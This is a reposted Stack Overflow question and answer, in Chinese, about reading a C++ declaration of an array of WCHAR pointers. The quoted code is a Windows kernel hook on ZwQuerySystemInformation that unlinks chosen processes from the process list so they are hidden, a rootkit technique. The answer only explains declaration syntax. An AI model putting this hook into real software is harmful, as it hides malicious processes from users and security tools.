gpt4 book ai didi

c++ - 遍历数组指针?

转载 作者:太空宇宙 更新时间:2023-11-04 08:56:29 29 4
gpt4 key购买 nike

我对 C++ 不是很有经验,我正在阅读一些代码并想知道这是怎么回事......

WCHAR *Process[128];
for(i=0; i<Process; i++)

我看到一个指向 wchar 数组的指针,你如何遍历它?是否要遍历整个数组?

完整代码如下:

WCHAR *ProcessToHide[128];
ULONG NbProcessToHide=0;

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformationAddress = NULL;

LONGLONG UserTime=0, KernelTime=0;

NTSTATUS ZwQuerySystemInformationHook(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{

NTSTATUS status;
PSYSTEM_PROCESS_INFORMATION curr;
PSYSTEM_PROCESS_INFORMATION prev;
ULONG i;

status = ((ZWQUERYSYSTEMINFORMATION)(ZwQuerySystemInformationAddress)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );

if( !NT_SUCCESS(status) )
return status;

if(SystemInformationClass!=5) // not a process request
return status;

for(i=0; i<NbProcessToHide; i++) {

curr = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
prev = NULL;

while(curr) {
//DbgPrint("Current item is %x\n", curr);
if (curr->ProcessName.Buffer != NULL) {

if( curr->ProcessName.Length == wcslen(ProcessToHide[i])*2 &&
!memcmp(curr->ProcessName.Buffer,ProcessToHide[i], curr->ProcessName.Length))
{

if(!prev) {
// we are first process
if(curr->NextEntryDelta) // if there is a process after it
// first process becomes this one
(PBYTE)SystemInformation += curr->NextEntryDelta;
else
// no process ! >_>
SystemInformation = NULL;
}
else {
// there was a process before
if(curr->NextEntryDelta) // if there is a process after
// previous process leads to next
prev->NextEntryDelta += curr->NextEntryDelta;
else
// previous process is the last one =)
prev->NextEntryDelta = 0;
}
}
else
// not a process to hide, prev ptr go to this process
prev = curr;
}

// curr go to next process
if(curr->NextEntryDelta)
((PBYTE)curr += curr->NextEntryDelta);
else
curr = NULL;
}
}

最佳答案

WCHAR *Process[128]; 不是指向 WCHAR 数组的指针,它是 WCHAR 指针数组(大概字符串)。

您可能想阅读 Reading C Declarations .

Example 2: char *argv[];

Step 1, write "declare argv as". Step 2, array to the right. Step 3, write "array of". Step 4, pointer to the left. Step 5, write "pointer to". Step 6, complete declaration. Step 7, write "char". Stop.

The declaration is: "declare argv as array of pointer to char". Note that it's NOT a pointer to an array of char. Array descriptors have precedence over pointer descriptors and are read first.

iNbProcessToHide 可以进行比较,因为它们都是 ULONG

关于c++ - 遍历数组指针?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/16746429/

29 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com